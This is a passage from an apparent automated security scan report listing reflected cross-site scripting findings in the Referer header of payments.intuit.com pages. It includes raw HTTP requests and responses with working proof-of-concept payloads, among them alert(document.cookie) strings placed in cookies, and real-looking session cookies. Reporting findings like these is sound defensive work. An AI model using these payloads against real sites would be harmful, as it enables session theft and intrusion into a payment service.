Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:53 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=Hl+omgw3mgYJwPVw-7Ka0A**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:54 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96143690A0805192AA117E300DFFB9A
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140382


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=2fb1c'-alert(1)-'0a97bbe41af';
                   </script>
...[SNIP]...

2.104. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5d309'-alert(1)-'98a1572654c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /products/quickbooks-payment-processing.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=5d309'-alert(1)-'98a1572654c

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:47 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=btxMA5VqwqQDHEHmDqtOzA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:48 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D960424A0A0805192AA117E3CAA3A4B6
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100547


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=5d309'-alert(1)-'98a1572654c';
                   </script>
...[SNIP]...

2.105. http://payments.intuit.com/products/quickbooks-payment-processing.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-processing.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 43536--><script>alert(1)</script>5f48ddc4902 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:03 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=wzoA97wyb5Q5h6Q0ZX7n2g**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:04 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96081C10A0805192AA117E3B2B38A89
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100579

...[SNIP]...
<script>alert(1)</script>5f48ddc4902 | -->
...[SNIP]...

2.106. http://payments.intuit.com/products/quickbooks-payment-solutions/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload eb605--><script>alert(1)</script>313dcde783a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /products/quickbooks-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=eb605--><script>alert(1)</script>313dcde783a

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:21 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=IOOtD5FBbrudVSKv9odFBw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:22 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95FDDB70A0805192AA117E38E79C1AD
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100578

...[SNIP]...
<script>alert(1)</script>313dcde783a | -->
...[SNIP]...

2.107. http://payments.intuit.com/products/quickbooks-payment-solutions/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 193fe'-alert(1)-'288dfdb8b4d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:04:02 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=crm5I6lOhZJyaODDHoAwfQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:41:03 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95F93050A0805192AA117E36EB42821
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dpayment_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 100546


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=193fe'-alert(1)-'288dfdb8b4d';
                   </script>
...[SNIP]...

2.108. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/ach.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 71edb'-alert(1)-'6b7e8734b5b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /products/quickbooks-payment-solutions/ach.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=71edb'-alert(1)-'6b7e8734b5b

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:59 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=madTfYdoG5tkbAh6pJksTg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:00 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9615C5C0A0805192AA117E3A5FE5D3D
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145458


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=71edb'-alert(1)-'6b7e8734b5b';
                   </script>
...[SNIP]...

2.109. http://payments.intuit.com/products/quickbooks-payment-solutions/ach.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/ach.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 9b18e--><script>alert(1)</script>e7e01249c3c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:06:05 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=zL8CCL7bM1jx4tivEw418w**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:43:06 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D96173AA0A0805192AA117E350D74E02
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=echecks_002dand_002dcheck_002dprocessing_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 145490

...[SNIP]...
<script>alert(1)</script>e7e01249c3c | -->
...[SNIP]...

2.110. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/credit-card-processing-services.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7408f'-alert(1)-'85140b02fc7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /products/quickbooks-payment-solutions/credit-card-processing-services.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=7408f'-alert(1)-'85140b02fc7

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:38 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=KXchY7zOwHEUHqUESwiMjg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:39 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D9610A390A0805192AA117E38D800405
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140381


...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=7408f'-alert(1)-'85140b02fc7';
                   </script>
...[SNIP]...

2.111. http://payments.intuit.com/products/quickbooks-payment-solutions/credit-card-processing-services.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/credit-card-processing-services.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload ee311--><script>alert(1)</script>ebc26ad0fcf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:05:49 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=JuEIdSq8Lvf1p84mE3Y8ZQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:42:50 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D961352D0A0805192AA117E3214A5750
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=quickbooks_002dcredit_002dcard_002dprocessing_002dservices_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 140415

...[SNIP]...
<script>alert(1)</script>ebc26ad0fcf | -->
...[SNIP]...

2.112. http://payments.intuit.com/products/quickbooks-payment-solutions/custom-gift-card-program.jsp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://payments.intuit.com
Path:	/products/quickbooks-payment-solutions/custom-gift-card-program.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d4413--><script>alert(1)</script>903e8593f48 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

